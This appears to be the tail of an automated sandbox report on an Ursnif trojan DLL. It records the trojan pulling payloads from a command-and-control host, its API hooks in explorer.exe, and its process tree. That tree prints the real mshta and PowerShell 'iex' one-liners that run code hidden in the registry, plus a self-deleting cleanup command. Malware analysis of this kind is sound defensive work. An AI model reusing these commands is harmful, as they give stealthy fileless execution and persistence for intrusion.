                                                          Data Ascii: u0DQO65TX[n`xCu(t (G<YmbZ1#UV+mv$K<z2|&``C`YS!PA11U0heT4!gB;;"HO(:qw%NpK6/J`8m%+|<phIh~l
                                                          2021-10-08 04:46:08 UTC201INData Raw: 03 f1 9b 10 f9 29 8a 21 a9 a1 75 75 26 bc 31 a8 bb 40 7a 68 50 e3 3e 48 98 94 f7 3c 63 84 f4 57 ce 30 80 be d8 c0 66 7a 9f fb 05 9b 9c 39 58 15 95 67 db ba e8 30 57 5b ca 96 8a 57 66 8a ce 65 8a 92 98 86 f5 2f 4e ba 5f 83 72 1c c4 32 79 6d 36 fb 48 63 17 45 e5 93 42 d7 c5 1e c6 b1 5b 96 4c b5 71 59 2a ba 97 db 47 8b e3 4b b0 ac f9 fa 8b 2f d5 28 58 9d 68 fd 17 42 3b b2 31 ee eb 37 96 16 59 a7 ac 8e 85 28 3e 5c 7e 38 b3 8d 68 e2 39 48 ba b4 33 f1 57 28 81 14 9b 63 42 f2 5f 9c f5 0b 04 0e fe 35 92 9c df 8e be 6a f2 b8 31 6f a7 c9 3c 36 9b 78 c3 00 f9 b1 14 42 98 ac 43 6f 33 0a 49 4e be dc 14 c2 f2 90 c2 f6 2c bd df 3c 60 6d 83 f6 f4 48 b7 de 18 db 77 da 76 48 3c 8c 59 6e 09 56 ff a6 6d 8c 3e 10 71 40 33 2e af 21 e5 21 55 27 c1 c7 29 47 26 0f 56 bc 14 01 04
                                                          Data Ascii: )!uu&1@zhP>H<cW0fz9Xg0W[Wfe/N_r2ym6HcEB[LqY*GK/(XhB;17Y(>\~8h9H3W(cB_5j1o<6xBCo3IN,<`mHwvH<YnVm>q@3.!!U')G&V
                                                          2021-10-08 04:46:08 UTC217INData Raw: 68 fc a2 2c 62 69 17 7e 64 30 53 66 82 12 65 25 31 80 13 2b 5e ed 93 06 79 a1 a8 4f c7 53 f6 97 fc 5f ed 47 e6 90 a0 1c b1 63 b0 2e e7 f3 dd 5b af 67 3b 85 db 3b d9 62 eb ad cb dc 8d 79 ab 80 67 75 0a d0 6d 60 db db ec 93 a1 0c 52 f3 95 1e 80 f1 06 9f 67 8f d0 16 41 52 3c bd 08 1c e5 fc 2f d4 d6 bd f1 70 18 8e 94 9b ac 2d 44 3f a9 e3 b6 8f c5 26 ad 49 d4 92 31 91 b8 f1 a4 31 10 e9 13 f5 b0 8d fc de e1 4d 57 0b 40 46 5a 23 00 ed 5d 80 54 3a 4b 4e c7 9c 21 c9 cc 4a 32 7d ad 60 76 16 0b 72 bc 62 27 e5 15 a4 fd 3e 58 57 11 0d fd 9f a7 fa a4 d6 de d6 f5 7b 21 54 df 08 ff b9 f5 9a 4e ec 3b 54 16 f0 7d 22 05 e0 b2 d1 a6 91 8d 59 4f 94 09 95 4e b5 02 91 e0 57 80 6c 74 8f 2a 5d 43 64 e6 44 d0 58 72 37 e6 54 f2 43 e9 5b 84 3b 01 16 df 5e f1 f0 b5 62 8d 94 7d 87 0b
                                                          Data Ascii: h,bi~d0Sfe%1+^yOS_Gc.[g;;bygum`RgAR</p-D?&I11MW@FZ#]T:KN!J2}`vrb'>XW{!TN;T}"YONWlt*]CdDXr7TC[;^b}


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
7           192.168.2.3  49829        193.29.104.83   443               C:\Windows\System32\loaddll32.exe

Timestamp: 2021-10-08 04:46:08 UTC    kBytes transferred: 223    Direction: OUT
GET /pojol/ad8SMO3QEV/WpK2KWVlzISPCUWri/sHIqFx0L8nEL/d6DW60Wq7Sc/nktLUA8MXJku9L/Zmk6jUfJynHeMmB_2FY4b/Civyvu50LYW7nG6R/vXmd0MgFzqo2GgW/fQxwYw_2BGvLQBdwxJ/0lhkdnAJr/xh_2Fs6N3R0PcVVrZUsT/V_2FUDCTlH6Z32G0s2B/iaQ6r5gLvcevP7/0Gv8.jop HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: xereunrtol.website

Timestamp: 2021-10-08 04:46:08 UTC    kBytes transferred: 223    Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 08 Oct 2021 04:46:08 GMT
Content-Type: application/zip
Content-Length: 275595
Connection: close
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=59r0hslmp7k029ruq00k56gvr7; path=/; domain=.xereunrtol.website
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: lang=en; expires=Sun, 07-Nov-2021 04:46:08 GMT; path=/
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename=client32.bin


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
8           192.168.2.3  49830        193.29.104.83   443               C:\Windows\System32\loaddll32.exe

Timestamp: 2021-10-08 04:46:09 UTC    kBytes transferred: 493    Direction: OUT
GET /pojol/pfDJgBAB44HEkaaE/IAkYjQDoenC7dCc/knaeZ_2Bc4niJWZDoT/92La9yVP8/Nm_2F8vIouJQNUgCe_2B/Wv7KOG1Nz3mjOa0l_2F/OnBpy4GwhZX8qV0mLK2Wlc/FREIwqk_2Fjl_/2BOUAmEa/t8HTP1o0pL0qYjqL1hIxYFo/1EnpJwv2G5/SCJcrEDAQ0UY_2FXk/piB_2BjH/Biqze_2FNrj/O.jop HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: xereunrtol.website

Timestamp: 2021-10-08 04:46:09 UTC    kBytes transferred: 493    Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 08 Oct 2021 04:46:09 GMT
Content-Type: application/zip
Content-Length: 1886
Connection: close
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=5r8o420cre2icnvtf8ofentj01; path=/; domain=.xereunrtol.website
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: lang=en; expires=Sun, 07-Nov-2021 04:46:09 GMT; path=/
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename=client32.bin


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
9           192.168.2.3  49831        193.29.104.83   443               C:\Windows\System32\loaddll32.exe

Timestamp: 2021-10-08 04:46:14 UTC    kBytes transferred: 495    Direction: OUT
GET /pojol/W4QiDRChG_/2BVblDFptU_2BRt86/bDQ28Atm7UJp/hMrJ18dixaJ/Ehvso7jB6b1A7n/fuEtfFyRY6z_2FVw8s1t6/enfrMlaYNyygktry/YNTHSHxjijP0_2B/G7FZq6LMuf5Bf2R30l/ih28AE5GN/brwux6ZnrceibZm2b3Bl/W4v_2BEcLNfhDC9uqG8/mC3B1bUhAB/QJIQRA6ic/2.jop HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: xereunrtol.website

Timestamp: 2021-10-08 04:46:14 UTC    kBytes transferred: 496    Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 08 Oct 2021 04:46:14 GMT
Content-Type: application/zip
Content-Length: 218248
Connection: close
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=bnb8bbjh246g8ah1kt3ji1eou1; path=/; domain=.xereunrtol.website
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: lang=en; expires=Sun, 07-Nov-2021 04:46:14 GMT; path=/
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename=client32.bin


                                                          Code Manipulations

                                                          User Modules

                                                          Hook Summary

                                                          Function Name | Hook Type | Active in Processes
                                                          CreateProcessAsUserW | EAT | explorer.exe
                                                          CreateProcessAsUserW | INLINE | explorer.exe
                                                          CreateProcessW | EAT | explorer.exe
                                                          CreateProcessW | INLINE | explorer.exe
                                                          CreateProcessA | EAT | explorer.exe
                                                          CreateProcessA | INLINE | explorer.exe
                                                          api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | explorer.exe
                                                          api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | explorer.exe

                                                          Processes

                                                          Process: explorer.exe, Module: KERNEL32.DLL
                                                          Function Name | Hook Type | New Data
                                                          CreateProcessAsUserW | EAT | 7FFC8BAF521C
                                                          CreateProcessAsUserW | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
                                                          CreateProcessW | EAT | 7FFC8BAF5200
                                                          CreateProcessW | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
                                                          CreateProcessA | EAT | 7FFC8BAF520E
                                                          CreateProcessA | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
                                                          Process: explorer.exe, Module: WININET.dll
                                                          Function Name | Hook Type | New Data
                                                          api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | 7FFC8BAF5200
                                                          api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | 6640E2C
                                                          Process: explorer.exe, Module: user32.dll
                                                          Function Name | Hook Type | New Data
                                                          api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | 7FFC8BAF5200
                                                          api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | 6640E2C

                                                          Statistics

                                                          Behavior

                                                          System Behavior

                                                          General

                                                          Start time:06:43:32
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\loaddll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:loaddll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
                                                          Imagebase:0xdd0000
                                                          File size:893440 bytes
                                                          MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.534170711.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.678615660.0000000004348000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.534139791.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.678663993.0000000004348000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.679072196.0000000004348000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.678803157.0000000004348000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.534181195.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.533885657.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.678996946.0000000004348000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.620987281.00000000018D8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp, Author: Joe Security
                                                          Reputation:moderate

                                                          General

                                                          Start time:06:43:33
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1
                                                          Imagebase:0xd80000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:06:43:33
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny
                                                          Imagebase:0xab0000
                                                          File size:61952 bytes
                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.456819132.0000000000690000.00000040.00000001.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          General

                                                          Start time:06:43:33
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1
                                                          Imagebase:0xab0000
                                                          File size:61952 bytes
                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.545735398.0000000005648000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.545790657.0000000005648000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.545843952.0000000005648000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.635415693.0000000005648000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.545818216.0000000005648000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.545905967.0000000005648000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.637594207.000000000544C000.00000004.00000040.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          General

                                                          Start time:06:43:37
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Consonantget
                                                          Imagebase:0xab0000
                                                          File size:61952 bytes
                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.524931430.0000000004A79000.00000004.00000040.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          General

                                                          Start time:06:43:43
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,LongSubstance
                                                          Imagebase:0xab0000
                                                          File size:61952 bytes
                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.488168081.0000000002F70000.00000040.00000001.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          General

                                                          Start time:06:46:14
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\mshta.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
                                                          Imagebase:0x7ff610460000
                                                          File size:14848 bytes
                                                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Start time:06:46:16
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
                                                          Imagebase:0x7ff777fc0000
                                                          File size:447488 bytes
                                                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          General

                                                          Start time:06:46:16
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7f20f0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:06:46:19
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\mshta.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Edc0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Edc0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
                                                          Imagebase:0x7ff610460000
                                                          File size:14848 bytes
                                                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:06:46:21
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
                                                          Imagebase:0x7ff777fc0000
                                                          File size:447488 bytes
                                                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Start time:06:46:21
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7f20f0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:06:46:25
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline'
                                                          Imagebase:0x7ff677cd0000
                                                          File size:2739304 bytes
                                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Start time:06:46:26
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9EC1.tmp' 'c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP'
                                                          Imagebase:0x7ff732960000
                                                          File size:47280 bytes
                                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:06:46:28
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
                                                          Imagebase:0x7ff677cd0000
                                                          File size:2739304 bytes
                                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Start time:06:46:29
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline'
                                                          Imagebase:0x7ff677cd0000
                                                          File size:2739304 bytes
                                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Start time:06:46:31
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB12F.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP'
                                                          Imagebase:0x7ff732960000
                                                          File size:47280 bytes
                                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:06:46:31
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB287.tmp' 'c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP'
                                                          Imagebase:0x7ff732960000
                                                          File size:47280 bytes
                                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:06:46:35
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline'
                                                          Imagebase:0x7ff677cd0000
                                                          File size:2739304 bytes
                                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Start time:06:46:35
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\control.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\control.exe -h
                                                          Imagebase:0x7ff6dd8e0000
                                                          File size:117760 bytes
                                                          MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:06:46:37
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC95B.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP'
                                                          Imagebase:0x7ff732960000
                                                          File size:47280 bytes
                                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:06:46:39
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\rundll32.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                                                          Imagebase:0x7ff6ce540000
                                                          File size:69632 bytes
                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:06:46:41
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff720ea0000
                                                          File size:3933184 bytes
                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, Author: Joe Security

                                                          General

                                                          Start time:06:46:43
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\control.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\control.exe -h
                                                          Imagebase:0x7ff6dd8e0000
                                                          File size:117760 bytes
                                                          MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:06:46:46
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\rundll32.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                                                          Imagebase:0x7ff6ce540000
                                                          File size:69632 bytes
                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:06:46:59
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
                                                          Imagebase:0x7ff673be0000
                                                          File size:273920 bytes
                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:06:46:59
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
